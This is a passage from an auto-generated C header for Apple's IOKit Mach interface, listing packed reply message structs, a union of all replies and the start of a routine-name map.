mach_msg_header_t Head; 2897 | NDR_record_t NDR; 2898 | kern_return_t RetCode; 2899 | boolean_t inPlane; 2900 | } __Reply__io_registry_entry_in_plane_t; 2901 | #ifdef __MigPackStructs 2902 | #pragma pack() 2903 | #endif 2904 | 2905 | #ifdef __MigPackStructs 2906 | #pragma pack(4) 2907 | #endif 2908 | typedef struct { 2909 | mach_msg_header_t Head; 2910 | NDR_record_t NDR; 2911 | kern_return_t RetCode; 2912 | uint32_t retainCount; 2913 | } __Reply__io_object_get_retain_count_t; 2914 | #ifdef __MigPackStructs 2915 | #pragma pack() 2916 | #endif 2917 | 2918 | #ifdef __MigPackStructs 2919 | #pragma pack(4) 2920 | #endif 2921 | typedef struct { 2922 | mach_msg_header_t Head; 2923 | NDR_record_t NDR; 2924 | kern_return_t RetCode; 2925 | uint32_t busyState; 2926 | } __Reply__io_service_get_busy_state_t; 2927 | #ifdef __MigPackStructs 2928 | #pragma pack() 2929 | #endif 2930 | 2931 | #ifdef __MigPackStructs 2932 | #pragma pack(4) 2933 | #endif 2934 | typedef struct { 2935 | mach_msg_header_t Head; 2936 | NDR_record_t NDR; 2937 | kern_return_t RetCode; 2938 | } __Reply__io_service_wait_quiet_t; 2939 | #ifdef __MigPackStructs 2940 | #pragma pack() 2941 | #endif 2942 | 2943 | #ifdef __MigPackStructs 2944 | #pragma pack(4) 2945 | #endif 2946 | typedef struct { 2947 | mach_msg_header_t Head; 2948 | /* start of the kernel processed data */ 2949 | mach_msg_body_t msgh_body; 2950 | mach_msg_port_descriptor_t iterator; 2951 | /* end of the kernel processed data */ 2952 | } __Reply__io_registry_entry_create_iterator_t; 2953 | #ifdef __MigPackStructs 2954 | #pragma pack() 2955 | #endif 2956 | 2957 | #ifdef __MigPackStructs 2958 | #pragma pack(4) 2959 | #endif 2960 | typedef struct { 2961 | mach_msg_header_t Head; 2962 | NDR_record_t NDR; 2963 | kern_return_t RetCode; 2964 | boolean_t is_valid; 2965 | } __Reply__io_iterator_is_valid_t; 2966 | #ifdef __MigPackStructs 2967 | #pragma pack() 2968 | #endif 2969 | 2970 | #ifdef __MigPackStructs 2971 | #pragma pack(4) 2972 | #endif 2973 | typedef struct { 2974 | mach_msg_header_t Head; 2975 | NDR_record_t NDR; 2976 | kern_return_t RetCode; 2977 | kern_return_t result; 2978 | } __Reply__io_catalog_send_data_t; 2979 | #ifdef __MigPackStructs 2980 | #pragma pack() 2981 | #endif 2982 | 2983 | #ifdef __MigPackStructs 2984 | #pragma pack(4) 2985 | #endif 2986 | typedef struct { 2987 | mach_msg_header_t Head; 2988 | NDR_record_t NDR; 2989 | kern_return_t RetCode; 2990 | } __Reply__io_catalog_terminate_t; 2991 | #ifdef __MigPackStructs 2992 | #pragma pack() 2993 | #endif 2994 | 2995 | #ifdef __MigPackStructs 2996 | #pragma pack(4) 2997 | #endif 2998 | typedef struct { 2999 | mach_msg_header_t Head; 3000 | /* start of the kernel processed data */ 3001 | mach_msg_body_t msgh_body; 3002 | mach_msg_ool_descriptor_t outData; 3003 | /* end of the kernel processed data */ 3004 | NDR_record_t NDR; 3005 | mach_msg_type_number_t outDataCnt; 3006 | } __Reply__io_catalog_get_data_t; 3007 | #ifdef __MigPackStructs 3008 | #pragma pack() 3009 | #endif 3010 | 3011 | #ifdef __MigPackStructs 3012 | #pragma pack(4) 3013 | #endif 3014 | typedef struct { 3015 | mach_msg_header_t Head; 3016 | NDR_record_t NDR; 3017 | kern_return_t RetCode; 3018 | uint32_t genCount; 3019 | } __Reply__io_catalog_get_gen_count_t; 3020 | #ifdef __MigPackStructs 3021 | #pragma pack() 3022 | #endif 3023 | 3024 | #ifdef __MigPackStructs 3025 | #pragma pack(4) 3026 | #endif 3027 | typedef struct { 3028 | mach_msg_header_t Head; 3029 | NDR_record_t NDR; 3030 | kern_return_t RetCode; 3031 | } __Reply__io_catalog_module_loaded_t; 3032 | #ifdef __MigPackStructs 3033 | #pragma pack() 3034 | #endif 3035 | 3036 | #ifdef __MigPackStructs 3037 | #pragma pack(4) 3038 | #endif 3039 | typedef struct { 3040 | mach_msg_header_t Head; 3041 | NDR_record_t NDR; 3042 | kern_return_t RetCode; 3043 | } __Reply__io_catalog_reset_t; 3044 | #ifdef __MigPackStructs 3045 | #pragma pack() 3046 | #endif 3047 | 3048 | #ifdef __MigPackStructs 3049 | #pragma pack(4) 3050 | #endif 3051 | typedef struct { 3052 | mach_msg_header_t Head; 3053 | NDR_record_t NDR; 3054 | kern_return_t RetCode; 3055 | } __Reply__io_service_request_probe_t; 3056 | #ifdef __MigPackStructs 3057 | #pragma pack() 3058 | #endif 3059 | 3060 | #ifdef __MigPackStructs 3061 | #pragma pack(4) 3062 | #endif 3063 | typedef struct { 3064 | mach_msg_header_t Head; 3065 | NDR_record_t NDR; 3066 | kern_return_t RetCode; 3067 | mach_msg_type_number_t nameOffset; /* MiG doesn't use it */ 3068 | mach_msg_type_number_t nameCnt; 3069 | char name[128]; 3070 | } __Reply__io_registry_entry_get_name_in_plane_t; 3071 | #ifdef __MigPackStructs 3072 | #pragma pack() 3073 | #endif 3074 | 3075 | #ifdef __MigPackStructs 3076 | #pragma pack(4) 3077 | #endif 3078 | typedef struct { 3079 | mach_msg_header_t Head; 3080 | NDR_record_t NDR; 3081 | kern_return_t RetCode; 3082 | boolean_t matches; 3083 | } __Reply__io_service_match_property_table_t; 3084 | #ifdef __MigPackStructs 3085 | #pragma pack() 3086 | #endif 3087 | 3088 | #ifdef __MigPackStructs 3089 | #pragma pack(4) 3090 | #endif 3091 | typedef struct { 3092 | mach_msg_header_t Head; 3093 | NDR_record_t NDR; 3094 | kern_return_t RetCode; 3095 | mach_msg_type_number_t outputCnt; 3096 | io_user_scalar_t output[16]; 3097 | } __Reply__io_async_method_scalarI_scalarO_t; 3098 | #ifdef __MigPackStructs 3099 | #pragma pack() 3100 | #endif 3101 | 3102 | #ifdef __MigPackStructs 3103 | #pragma pack(4) 3104 | #endif 3105 | typedef struct { 3106 | mach_msg_header_t Head; 3107 | NDR_record_t NDR; 3108 | kern_return_t RetCode; 3109 | mach_msg_type_number_t outputCnt; 3110 | char output[4096]; 3111 | } __Reply__io_async_method_scalarI_structureO_t; 3112 | #ifdef __MigPackStructs 3113 | #pragma pack() 3114 | #endif 3115 | 3116 | #ifdef __MigPackStructs 3117 | #pragma pack(4) 3118 | #endif 3119 | typedef struct { 3120 | mach_msg_header_t Head; 3121 | NDR_record_t NDR; 3122 | kern_return_t RetCode; 3123 | } __Reply__io_async_method_scalarI_structureI_t; 3124 | #ifdef __MigPackStructs 3125 | #pragma pack() 3126 | #endif 3127 | 3128 | #ifdef __MigPackStructs 3129 | #pragma pack(4) 3130 | #endif 3131 | typedef struct { 3132 | mach_msg_header_t Head; 3133 | NDR_record_t NDR; 3134 | kern_return_t RetCode; 3135 | mach_msg_type_number_t outputCnt; 3136 | char output[4096]; 3137 | } __Reply__io_async_method_structureI_structureO_t; 3138 | #ifdef __MigPackStructs 3139 | #pragma pack() 3140 | #endif 3141 | 3142 | #ifdef __MigPackStructs 3143 | #pragma pack(4) 3144 | #endif 3145 | typedef struct { 3146 | mach_msg_header_t Head; 3147 | /* start of the kernel processed data */ 3148 | mach_msg_body_t msgh_body; 3149 | mach_msg_port_descriptor_t notification; 3150 | /* end of the kernel processed data */ 3151 | } __Reply__io_service_add_notification_t; 3152 | #ifdef __MigPackStructs 3153 | #pragma pack() 3154 | #endif 3155 | 3156 | #ifdef __MigPackStructs 3157 | #pragma pack(4) 3158 | #endif 3159 | typedef struct { 3160 | mach_msg_header_t Head; 3161 | /* start of the kernel processed data */ 3162 | mach_msg_body_t msgh_body; 3163 | mach_msg_port_descriptor_t notification; 3164 | /* end of the kernel processed data */ 3165 | } __Reply__io_service_add_interest_notification_t; 3166 | #ifdef __MigPackStructs 3167 | #pragma pack() 3168 | #endif 3169 | 3170 | #ifdef __MigPackStructs 3171 | #pragma pack(4) 3172 | #endif 3173 | typedef struct { 3174 | mach_msg_header_t Head; 3175 | NDR_record_t NDR; 3176 | kern_return_t RetCode; 3177 | } __Reply__io_service_acknowledge_notification_t; 3178 | #ifdef __MigPackStructs 3179 | #pragma pack() 3180 | #endif 3181 | 3182 | #ifdef __MigPackStructs 3183 | #pragma pack(4) 3184 | #endif 3185 | typedef struct { 3186 | mach_msg_header_t Head; 3187 | /* start of the kernel processed data */ 3188 | mach_msg_body_t msgh_body; 3189 | mach_msg_port_descriptor_t semaphore; 3190 | /* end of the kernel processed data */ 3191 | } __Reply__io_connect_get_notification_semaphore_t; 3192 | #ifdef __MigPackStructs 3193 | #pragma pack() 3194 | #endif 3195 | 3196 | #ifdef __MigPackStructs 3197 | #pragma pack(4) 3198 | #endif 3199 | typedef struct { 3200 | mach_msg_header_t Head; 3201 | NDR_record_t NDR; 3202 | kern_return_t RetCode; 3203 | } __Reply__io_connect_unmap_memory_t; 3204 | #ifdef __MigPackStructs 3205 | #pragma pack() 3206 | #endif 3207 | 3208 | #ifdef __MigPackStructs 3209 | #pragma pack(4) 3210 | #endif 3211 | typedef struct { 3212 | mach_msg_header_t Head; 3213 | NDR_record_t NDR; 3214 | kern_return_t RetCode; 3215 | mach_msg_type_number_t locationOffset; /* MiG doesn't use it */ 3216 | mach_msg_type_number_t locationCnt; 3217 | char location[128]; 3218 | } __Reply__io_registry_entry_get_location_in_plane_t; 3219 | #ifdef __MigPackStructs 3220 | #pragma pack() 3221 | #endif 3222 | 3223 | #ifdef __MigPackStructs 3224 | #pragma pack(4) 3225 | #endif 3226 | typedef struct { 3227 | mach_msg_header_t Head; 3228 | /* start of the kernel processed data */ 3229 | mach_msg_body_t msgh_body; 3230 | mach_msg_ool_descriptor_t properties; 3231 | /* end of the kernel processed data */ 3232 | NDR_record_t NDR; 3233 | mach_msg_type_number_t propertiesCnt; 3234 | } __Reply__io_registry_entry_get_property_recursively_t; 3235 | #ifdef __MigPackStructs 3236 | #pragma pack() 3237 | #endif 3238 | 3239 | #ifdef __MigPackStructs 3240 | #pragma pack(4) 3241 | #endif 3242 | typedef struct { 3243 | mach_msg_header_t Head; 3244 | NDR_record_t NDR; 3245 | kern_return_t RetCode; 3246 | uint64_t state; 3247 | uint32_t busy_state; 3248 | uint64_t accumulated_busy_time; 3249 | } __Reply__io_service_get_state_t; 3250 | #ifdef __MigPackStructs 3251 | #pragma pack() 3252 | #endif 3253 | 3254 | #ifdef __MigPackStructs 3255 | #pragma pack(4) 3256 | #endif 3257 | typedef struct { 3258 | mach_msg_header_t Head; 3259 | /* start of the kernel processed data */ 3260 | mach_msg_body_t msgh_body; 3261 | mach_msg_port_descriptor_t existing; 3262 | /* end of the kernel processed data */ 3263 | NDR_record_t NDR; 3264 | kern_return_t result; 3265 | } __Reply__io_service_get_matching_services_ool_t; 3266 | #ifdef __MigPackStructs 3267 | #pragma pack() 3268 | #endif 3269 | 3270 | #ifdef __MigPackStructs 3271 | #pragma pack(4) 3272 | #endif 3273 | typedef struct { 3274 | mach_msg_header_t Head; 3275 | NDR_record_t NDR; 3276 | kern_return_t RetCode; 3277 | kern_return_t result; 3278 | boolean_t matches; 3279 | } __Reply__io_service_match_property_table_ool_t; 3280 | #ifdef __MigPackStructs 3281 | #pragma pack() 3282 | #endif 3283 | 3284 | #ifdef __MigPackStructs 3285 | #pragma pack(4) 3286 | #endif 3287 | typedef struct { 3288 | mach_msg_header_t Head; 3289 | /* start of the kernel processed data */ 3290 | mach_msg_body_t msgh_body; 3291 | mach_msg_port_descriptor_t notification; 3292 | /* end of the kernel processed data */ 3293 | NDR_record_t NDR; 3294 | kern_return_t result; 3295 | } __Reply__io_service_add_notification_ool_t; 3296 | #ifdef __MigPackStructs 3297 | #pragma pack() 3298 | #endif 3299 | 3300 | #ifdef __MigPackStructs 3301 | #pragma pack(4) 3302 | #endif 3303 | typedef struct { 3304 | mach_msg_header_t Head; 3305 | NDR_record_t NDR; 3306 | kern_return_t RetCode; 3307 | mach_msg_type_number_t class_nameOffset; /* MiG doesn't use it */ 3308 | mach_msg_type_number_t class_nameCnt; 3309 | char class_name[128]; 3310 | } __Reply__io_object_get_superclass_t; 3311 | #ifdef __MigPackStructs 3312 | #pragma pack() 3313 | #endif 3314 | 3315 | #ifdef __MigPackStructs 3316 | #pragma pack(4) 3317 | #endif 3318 | typedef struct { 3319 | mach_msg_header_t Head; 3320 | NDR_record_t NDR; 3321 | kern_return_t RetCode; 3322 | mach_msg_type_number_t class_nameOffset; /* MiG doesn't use it */ 3323 | mach_msg_type_number_t class_nameCnt; 3324 | char class_name[128]; 3325 | } __Reply__io_object_get_bundle_identifier_t; 3326 | #ifdef __MigPackStructs 3327 | #pragma pack() 3328 | #endif 3329 | 3330 | #ifdef __MigPackStructs 3331 | #pragma pack(4) 3332 | #endif 3333 | typedef struct { 3334 | mach_msg_header_t Head; 3335 | /* start of the kernel processed data */ 3336 | mach_msg_body_t msgh_body; 3337 | mach_msg_port_descriptor_t connection; 3338 | /* end of the kernel processed data */ 3339 | NDR_record_t NDR; 3340 | kern_return_t result; 3341 | } __Reply__io_service_open_extended_t; 3342 | #ifdef __MigPackStructs 3343 | #pragma pack() 3344 | #endif 3345 | 3346 | #ifdef __MigPackStructs 3347 | #pragma pack(4) 3348 | #endif 3349 | typedef struct { 3350 | mach_msg_header_t Head; 3351 | NDR_record_t NDR; 3352 | kern_return_t RetCode; 3353 | mach_vm_address_t address; 3354 | mach_vm_size_t size; 3355 | } __Reply__io_connect_map_memory_into_task_t; 3356 | #ifdef __MigPackStructs 3357 | #pragma pack() 3358 | #endif 3359 | 3360 | #ifdef __MigPackStructs 3361 | #pragma pack(4) 3362 | #endif 3363 | typedef struct { 3364 | mach_msg_header_t Head; 3365 | NDR_record_t NDR; 3366 | kern_return_t RetCode; 3367 | } __Reply__io_connect_unmap_memory_from_task_t; 3368 | #ifdef __MigPackStructs 3369 | #pragma pack() 3370 | #endif 3371 | 3372 | #ifdef __MigPackStructs 3373 | #pragma pack(4) 3374 | #endif 3375 | typedef struct { 3376 | mach_msg_header_t Head; 3377 | NDR_record_t NDR; 3378 | kern_return_t RetCode; 3379 | mach_msg_type_number_t inband_outputCnt; 3380 | char inband_output[4096]; 3381 | mach_msg_type_number_t scalar_outputCnt; 3382 | uint64_t scalar_output[16]; 3383 | mach_vm_size_t ool_output_size; 3384 | } __Reply__io_connect_method_t; 3385 | #ifdef __MigPackStructs 3386 | #pragma pack() 3387 | #endif 3388 | 3389 | #ifdef __MigPackStructs 3390 | #pragma pack(4) 3391 | #endif 3392 | typedef struct { 3393 | mach_msg_header_t Head; 3394 | NDR_record_t NDR; 3395 | kern_return_t RetCode; 3396 | mach_msg_type_number_t inband_outputCnt; 3397 | char inband_output[4096]; 3398 | mach_msg_type_number_t scalar_outputCnt; 3399 | uint64_t scalar_output[16]; 3400 | mach_vm_size_t ool_output_size; 3401 | } __Reply__io_connect_async_method_t; 3402 | #ifdef __MigPackStructs 3403 | #pragma pack() 3404 | #endif 3405 | 3406 | #ifdef __MigPackStructs 3407 | #pragma pack(4) 3408 | #endif 3409 | typedef struct { 3410 | mach_msg_header_t Head; 3411 | NDR_record_t NDR; 3412 | kern_return_t RetCode; 3413 | uint64_t entry_id; 3414 | } __Reply__io_registry_entry_get_registry_entry_id_t; 3415 | #ifdef __MigPackStructs 3416 | #pragma pack() 3417 | #endif 3418 | 3419 | #ifdef __MigPackStructs 3420 | #pragma pack(4) 3421 | #endif 3422 | typedef struct { 3423 | mach_msg_header_t Head; 3424 | /* start of the kernel processed data */ 3425 | mach_msg_body_t msgh_body; 3426 | mach_msg_ool_descriptor_t var_output; 3427 | /* end of the kernel processed data */ 3428 | NDR_record_t NDR; 3429 | mach_msg_type_number_t inband_outputCnt; 3430 | char inband_output[4096]; 3431 | mach_msg_type_number_t scalar_outputCnt; 3432 | uint64_t scalar_output[16]; 3433 | mach_msg_type_number_t var_outputCnt; 3434 | } __Reply__io_connect_method_var_output_t; 3435 | #ifdef __MigPackStructs 3436 | #pragma pack() 3437 | #endif 3438 | 3439 | #ifdef __MigPackStructs 3440 | #pragma pack(4) 3441 | #endif 3442 | typedef struct { 3443 | mach_msg_header_t Head; 3444 | /* start of the kernel processed data */ 3445 | mach_msg_body_t msgh_body; 3446 | mach_msg_port_descriptor_t service; 3447 | /* end of the kernel processed data */ 3448 | } __Reply__io_service_get_matching_service_t; 3449 | #ifdef __MigPackStructs 3450 | #pragma pack() 3451 | #endif 3452 | 3453 | #ifdef __MigPackStructs 3454 | #pragma pack(4) 3455 | #endif 3456 | typedef struct { 3457 | mach_msg_header_t Head; 3458 | /* start of the kernel processed data */ 3459 | mach_msg_body_t msgh_body; 3460 | mach_msg_port_descriptor_t service; 3461 | /* end of the kernel processed data */ 3462 | NDR_record_t NDR; 3463 | kern_return_t result; 3464 | } __Reply__io_service_get_matching_service_ool_t; 3465 | #ifdef __MigPackStructs 3466 | #pragma pack() 3467 | #endif 3468 | 3469 | #ifdef __MigPackStructs 3470 | #pragma pack(4) 3471 | #endif 3472 | typedef struct { 3473 | mach_msg_header_t Head; 3474 | NDR_record_t NDR; 3475 | kern_return_t RetCode; 3476 | uint64_t authorization_id; 3477 | } __Reply__io_service_get_authorization_id_t; 3478 | #ifdef __MigPackStructs 3479 | #pragma pack() 3480 | #endif 3481 | 3482 | #ifdef __MigPackStructs 3483 | #pragma pack(4) 3484 | #endif 3485 | typedef struct { 3486 | mach_msg_header_t Head; 3487 | NDR_record_t NDR; 3488 | kern_return_t RetCode; 3489 | } __Reply__io_service_set_authorization_id_t; 3490 | #ifdef __MigPackStructs 3491 | #pragma pack() 3492 | #endif 3493 | 3494 | #ifdef __MigPackStructs 3495 | #pragma pack(4) 3496 | #endif 3497 | typedef struct { 3498 | mach_msg_header_t Head; 3499 | NDR_record_t NDR; 3500 | kern_return_t RetCode; 3501 | uint64_t version; 3502 | } __Reply__io_server_version_t; 3503 | #ifdef __MigPackStructs 3504 | #pragma pack() 3505 | #endif 3506 | 3507 | #ifdef __MigPackStructs 3508 | #pragma pack(4) 3509 | #endif 3510 | typedef struct { 3511 | mach_msg_header_t Head; 3512 | /* start of the kernel processed data */ 3513 | mach_msg_body_t msgh_body; 3514 | mach_msg_ool_descriptor_t properties; 3515 | /* end of the kernel processed data */ 3516 | NDR_record_t NDR; 3517 | mach_msg_type_number_t propertiesCnt; 3518 | } __Reply__io_registry_entry_get_properties_bin_t; 3519 | #ifdef __MigPackStructs 3520 | #pragma pack() 3521 | #endif 3522 | 3523 | #ifdef __MigPackStructs 3524 | #pragma pack(4) 3525 | #endif 3526 | typedef struct { 3527 | mach_msg_header_t Head; 3528 | /* start of the kernel processed data */ 3529 | mach_msg_body_t msgh_body; 3530 | mach_msg_ool_descriptor_t properties; 3531 | /* end of the kernel processed data */ 3532 | NDR_record_t NDR; 3533 | mach_msg_type_number_t propertiesCnt; 3534 | } __Reply__io_registry_entry_get_property_bin_t; 3535 | #ifdef __MigPackStructs 3536 | #pragma pack() 3537 | #endif 3538 | 3539 | #ifdef __MigPackStructs 3540 | #pragma pack(4) 3541 | #endif 3542 | typedef struct { 3543 | mach_msg_header_t Head; 3544 | /* start of the kernel processed data */ 3545 | mach_msg_body_t msgh_body; 3546 | mach_msg_port_descriptor_t service; 3547 | /* end of the kernel processed data */ 3548 | } __Reply__io_service_get_matching_service_bin_t; 3549 | #ifdef __MigPackStructs 3550 | #pragma pack() 3551 | #endif 3552 | 3553 | #ifdef __MigPackStructs 3554 | #pragma pack(4) 3555 | #endif 3556 | typedef struct { 3557 | mach_msg_header_t Head; 3558 | /* start of the kernel processed data */ 3559 | mach_msg_body_t msgh_body; 3560 | mach_msg_port_descriptor_t existing; 3561 | /* end of the kernel processed data */ 3562 | } __Reply__io_service_get_matching_services_bin_t; 3563 | #ifdef __MigPackStructs 3564 | #pragma pack() 3565 | #endif 3566 | 3567 | #ifdef __MigPackStructs 3568 | #pragma pack(4) 3569 | #endif 3570 | typedef struct { 3571 | mach_msg_header_t Head; 3572 | NDR_record_t NDR; 3573 | kern_return_t RetCode; 3574 | boolean_t matches; 3575 | } __Reply__io_service_match_property_table_bin_t; 3576 | #ifdef __MigPackStructs 3577 | #pragma pack() 3578 | #endif 3579 | 3580 | #ifdef __MigPackStructs 3581 | #pragma pack(4) 3582 | #endif 3583 | typedef struct { 3584 | mach_msg_header_t Head; 3585 | /* start of the kernel processed data */ 3586 | mach_msg_body_t msgh_body; 3587 | mach_msg_port_descriptor_t notification; 3588 | /* end of the kernel processed data */ 3589 | } __Reply__io_service_add_notification_bin_t; 3590 | #ifdef __MigPackStructs 3591 | #pragma pack() 3592 | #endif 3593 | 3594 | #ifdef __MigPackStructs 3595 | #pragma pack(4) 3596 | #endif 3597 | typedef struct { 3598 | mach_msg_header_t Head; 3599 | /* start of the kernel processed data */ 3600 | mach_msg_body_t msgh_body; 3601 | mach_msg_ool_descriptor_t path_ool; 3602 | /* end of the kernel processed data */ 3603 | NDR_record_t NDR; 3604 | mach_msg_type_number_t pathOffset; /* MiG doesn't use it */ 3605 | mach_msg_type_number_t pathCnt; 3606 | char path[4096]; 3607 | mach_msg_type_number_t path_oolCnt; 3608 | } __Reply__io_registry_entry_get_path_ool_t; 3609 | #ifdef __MigPackStructs 3610 | #pragma pack() 3611 | #endif 3612 | 3613 | #ifdef __MigPackStructs 3614 | #pragma pack(4) 3615 | #endif 3616 | typedef struct { 3617 | mach_msg_header_t Head; 3618 | /* start of the kernel processed data */ 3619 | mach_msg_body_t msgh_body; 3620 | mach_msg_port_descriptor_t registry_entry; 3621 | /* end of the kernel processed data */ 3622 | NDR_record_t NDR; 3623 | kern_return_t result; 3624 | } __Reply__io_registry_entry_from_path_ool_t; 3625 | #ifdef __MigPackStructs 3626 | #pragma pack() 3627 | #endif 3628 | #endif /* !__Reply__iokit_subsystem__defined */ 3629 | 3630 | /* union of all replies */ 3631 | 3632 | #ifndef __ReplyUnion__iokit_subsystem__defined 3633 | #define __ReplyUnion__iokit_subsystem__defined 3634 | union __ReplyUnion__iokit_subsystem { 3635 | __Reply__io_object_get_class_t Reply_io_object_get_class; 3636 | __Reply__io_object_conforms_to_t Reply_io_object_conforms_to; 3637 | __Reply__io_iterator_next_t Reply_io_iterator_next; 3638 | __Reply__io_iterator_reset_t Reply_io_iterator_reset; 3639 | __Reply__io_service_get_matching_services_t Reply_io_service_get_matching_services; 3640 | __Reply__io_registry_entry_get_property_t Reply_io_registry_entry_get_property; 3641 | __Reply__io_registry_create_iterator_t Reply_io_registry_create_iterator; 3642 | __Reply__io_registry_iterator_enter_entry_t Reply_io_registry_iterator_enter_entry; 3643 | __Reply__io_registry_iterator_exit_entry_t Reply_io_registry_iterator_exit_entry; 3644 | __Reply__io_registry_entry_from_path_t Reply_io_registry_entry_from_path; 3645 | __Reply__io_registry_entry_get_name_t Reply_io_registry_entry_get_name; 3646 | __Reply__io_registry_entry_get_properties_t Reply_io_registry_entry_get_properties; 3647 | __Reply__io_registry_entry_get_property_bytes_t Reply_io_registry_entry_get_property_bytes; 3648 | __Reply__io_registry_entry_get_child_iterator_t Reply_io_registry_entry_get_child_iterator; 3649 | __Reply__io_registry_entry_get_parent_iterator_t Reply_io_registry_entry_get_parent_iterator; 3650 | __Reply__io_service_close_t Reply_io_service_close; 3651 | __Reply__io_connect_get_service_t Reply_io_connect_get_service; 3652 | __Reply__io_connect_set_notification_port_t Reply_io_connect_set_notification_port; 3653 | __Reply__io_connect_map_memory_t Reply_io_connect_map_memory; 3654 | __Reply__io_connect_add_client_t Reply_io_connect_add_client; 3655 | __Reply__io_connect_set_properties_t Reply_io_connect_set_properties; 3656 | __Reply__io_connect_method_scalarI_scalarO_t Reply_io_connect_method_scalarI_scalarO; 3657 | __Reply__io_connect_method_scalarI_structureO_t Reply_io_connect_method_scalarI_structureO; 3658 | __Reply__io_connect_method_scalarI_structureI_t Reply_io_connect_method_scalarI_structureI; 3659 | __Reply__io_connect_method_structureI_structureO_t Reply_io_connect_method_structureI_structureO; 3660 | __Reply__io_registry_entry_get_path_t Reply_io_registry_entry_get_path; 3661 | __Reply__io_registry_get_root_entry_t Reply_io_registry_get_root_entry; 3662 | __Reply__io_registry_entry_set_properties_t Reply_io_registry_entry_set_properties; 3663 | __Reply__io_registry_entry_in_plane_t Reply_io_registry_entry_in_plane; 3664 | __Reply__io_object_get_retain_count_t Reply_io_object_get_retain_count; 3665 | __Reply__io_service_get_busy_state_t Reply_io_service_get_busy_state; 3666 | __Reply__io_service_wait_quiet_t Reply_io_service_wait_quiet; 3667 | __Reply__io_registry_entry_create_iterator_t Reply_io_registry_entry_create_iterator; 3668 | __Reply__io_iterator_is_valid_t Reply_io_iterator_is_valid; 3669 | __Reply__io_catalog_send_data_t Reply_io_catalog_send_data; 3670 | __Reply__io_catalog_terminate_t Reply_io_catalog_terminate; 3671 | __Reply__io_catalog_get_data_t Reply_io_catalog_get_data; 3672 | __Reply__io_catalog_get_gen_count_t Reply_io_catalog_get_gen_count; 3673 | __Reply__io_catalog_module_loaded_t Reply_io_catalog_module_loaded; 3674 | __Reply__io_catalog_reset_t Reply_io_catalog_reset; 3675 | __Reply__io_service_request_probe_t Reply_io_service_request_probe; 3676 | __Reply__io_registry_entry_get_name_in_plane_t Reply_io_registry_entry_get_name_in_plane; 3677 | __Reply__io_service_match_property_table_t Reply_io_service_match_property_table; 3678 | __Reply__io_async_method_scalarI_scalarO_t Reply_io_async_method_scalarI_scalarO; 3679 | __Reply__io_async_method_scalarI_structureO_t Reply_io_async_method_scalarI_structureO; 3680 | __Reply__io_async_method_scalarI_structureI_t Reply_io_async_method_scalarI_structureI; 3681 | __Reply__io_async_method_structureI_structureO_t Reply_io_async_method_structureI_structureO; 3682 | __Reply__io_service_add_notification_t Reply_io_service_add_notification; 3683 | __Reply__io_service_add_interest_notification_t Reply_io_service_add_interest_notification; 3684 | __Reply__io_service_acknowledge_notification_t Reply_io_service_acknowledge_notification; 3685 | __Reply__io_connect_get_notification_semaphore_t Reply_io_connect_get_notification_semaphore; 3686 | __Reply__io_connect_unmap_memory_t Reply_io_connect_unmap_memory; 3687 | __Reply__io_registry_entry_get_location_in_plane_t Reply_io_registry_entry_get_location_in_plane; 3688 | __Reply__io_registry_entry_get_property_recursively_t Reply_io_registry_entry_get_property_recursively; 3689 | __Reply__io_service_get_state_t Reply_io_service_get_state; 3690 | __Reply__io_service_get_matching_services_ool_t Reply_io_service_get_matching_services_ool; 3691 | __Reply__io_service_match_property_table_ool_t Reply_io_service_match_property_table_ool; 3692 | __Reply__io_service_add_notification_ool_t Reply_io_service_add_notification_ool; 3693 | __Reply__io_object_get_superclass_t Reply_io_object_get_superclass; 3694 | __Reply__io_object_get_bundle_identifier_t Reply_io_object_get_bundle_identifier; 3695 | __Reply__io_service_open_extended_t Reply_io_service_open_extended; 3696 | __Reply__io_connect_map_memory_into_task_t Reply_io_connect_map_memory_into_task; 3697 | __Reply__io_connect_unmap_memory_from_task_t Reply_io_connect_unmap_memory_from_task; 3698 | __Reply__io_connect_method_t Reply_io_connect_method; 3699 | __Reply__io_connect_async_method_t Reply_io_connect_async_method; 3700 | __Reply__io_registry_entry_get_registry_entry_id_t Reply_io_registry_entry_get_registry_entry_id; 3701 | __Reply__io_connect_method_var_output_t Reply_io_connect_method_var_output; 3702 | __Reply__io_service_get_matching_service_t Reply_io_service_get_matching_service; 3703 | __Reply__io_service_get_matching_service_ool_t Reply_io_service_get_matching_service_ool; 3704 | __Reply__io_service_get_authorization_id_t Reply_io_service_get_authorization_id; 3705 | __Reply__io_service_set_authorization_id_t Reply_io_service_set_authorization_id; 3706 | __Reply__io_server_version_t Reply_io_server_version; 3707 | __Reply__io_registry_entry_get_properties_bin_t Reply_io_registry_entry_get_properties_bin; 3708 | __Reply__io_registry_entry_get_property_bin_t Reply_io_registry_entry_get_property_bin; 3709 | __Reply__io_service_get_matching_service_bin_t Reply_io_service_get_matching_service_bin; 3710 | __Reply__io_service_get_matching_services_bin_t Reply_io_service_get_matching_services_bin; 3711 | __Reply__io_service_match_property_table_bin_t Reply_io_service_match_property_table_bin; 3712 | __Reply__io_service_add_notification_bin_t Reply_io_service_add_notification_bin; 3713 | __Reply__io_registry_entry_get_path_ool_t Reply_io_registry_entry_get_path_ool; 3714 | __Reply__io_registry_entry_from_path_ool_t Reply_io_registry_entry_from_path_ool; 3715 | }; 3716 | #endif /* !__RequestUnion__iokit_subsystem__defined */ 3717 | 3718 | #ifndef subsystem_to_name_map_iokit 3719 | #define subsystem_to_name_map_iokit \ 3720 | { "io_object_get_class", 2800 },\ 3721 | { "io_object_conforms_to", 2801 },\ 3722 | { "io_iterator_next", 2802 },\ 3723 | { "io_iterator_reset", 2803 },\ 3724 | { "io_service_get_matching_services", 2804 },\ 3725 | { "io_registry_entry_get_property", 2805 },\ 3726 | { "io_registry_create_iterator", 2806 },\ 3727 | { "io_registry_iterator_enter_entry", 2807 },\ 3728 | { "io_registry_iterator_exit_entry", 2808 },\ 3729 | { "io_registry_entry_from_path", 2809 },\ 3730 | { "io_registry_entry_get_name", 2810 },\ 3731 | { "io_registry_entry_get_properties", 2811 },\ 3732 | { "io_registry_entry_get_property_bytes", 2812 },\ 3733 | { "io_registry_entry_get_child_iterator", 2813 },\ 3734 | { "io_registry_entry_get_parent_iterator", 2814 },\ 3735 | { "io_service_close", 2816 },\ 3736 | { "io_connect_get_service", 2817 },\ 3737 | { "io_connect_set_notification_port", 2818 },\ 3738 | { "io_connect_map_memory", 2819 },\ 3739 | { "io_connect_add_client", 2820 },\ 3740 | { "io_connect_set_properties", 2821 },\ 3741 | { "io_connect_method_scalarI_scalarO", 2822 },\ 3742 | { "io_connect_method_scalarI_structureO", 2823 },\ 3743 | { 